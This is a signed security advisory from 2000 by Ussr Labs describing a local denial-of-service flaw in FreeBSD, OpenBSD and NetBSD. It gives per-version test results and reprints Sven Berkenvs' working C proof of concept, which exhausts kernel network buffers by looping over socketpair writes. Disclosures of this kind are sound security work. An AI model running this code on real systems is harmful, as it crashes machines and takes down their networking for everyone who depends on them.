Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability

[labs () USSRBACK COM (Ussr Labs)]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability

Release Date:
April 29, 2000

Systems Affected:
FreeBSD 3.3-RELEASE
FreeBSD 4.0-RELEASE
FreeBSD 5.0 (maybe)
Openbsd 2.5
Openbsd 2.6
Openbsd 2.7 (maybe)
NetBSD  1.4.1

THE PROBLEM

- From an original posting made about last September by Sven Berkenvs
(sven () ILSE NL) to bugtraq:

- --- Forward ---

I stumbled across a denial of service attack on FreeBSD systems,
where
an unpriviledged user can panic the kernel. Quick and dirty testing
(code attached at the end of this mail) showed OpenBSD is vulnerable
too:

FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to
test it on older FreeBSD versions.
OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with
NMBSCLUSTERS=8192:
The kernel logs one "/bsd: mb_map full" and all processes trying to
send
something over the network get stuck waiting in mbuf. Locally the
system
continues to function. Tested by a friend.

NetBSD: Not available, but it is highly probable that the affected
code
in OpenBSD is from its parent NetBSD.

- --- End of Forward ---

Upon testing this code on the new versions of *bsd the exploit still
works.

FreeBSD - 3.3-RELEASE: reboots the pc
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs
        recieves /kernel: xl0: no memory for rx list -- packet dropped!
        All network connection is dead and the route table is a mess.
FreeBSD - 5.0-Current: Untested
Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full
Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full
Openbsd - 2.7: Untested
NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase
NMBCLUS
        The network connection is dead.
NetBSD - 1.4.2: Untested

- From what I have tested on, Linux does not have any issue with
this piece of code. As for the other unices, they have not been
tested.

THE CODE

The original code written by Sven Berkenvs that causes this:

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i,
sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i,
sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs () ussrback com
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOYgJAK3JcbWNj6DDEQJNMQCgzvEMALCmfNJ9EpPVF1uRNFiniC8AoKsV
ucQIKYXTFMT6TzTx3JNHVw0L
=LDeL
-----END PGP SIGNATURE-----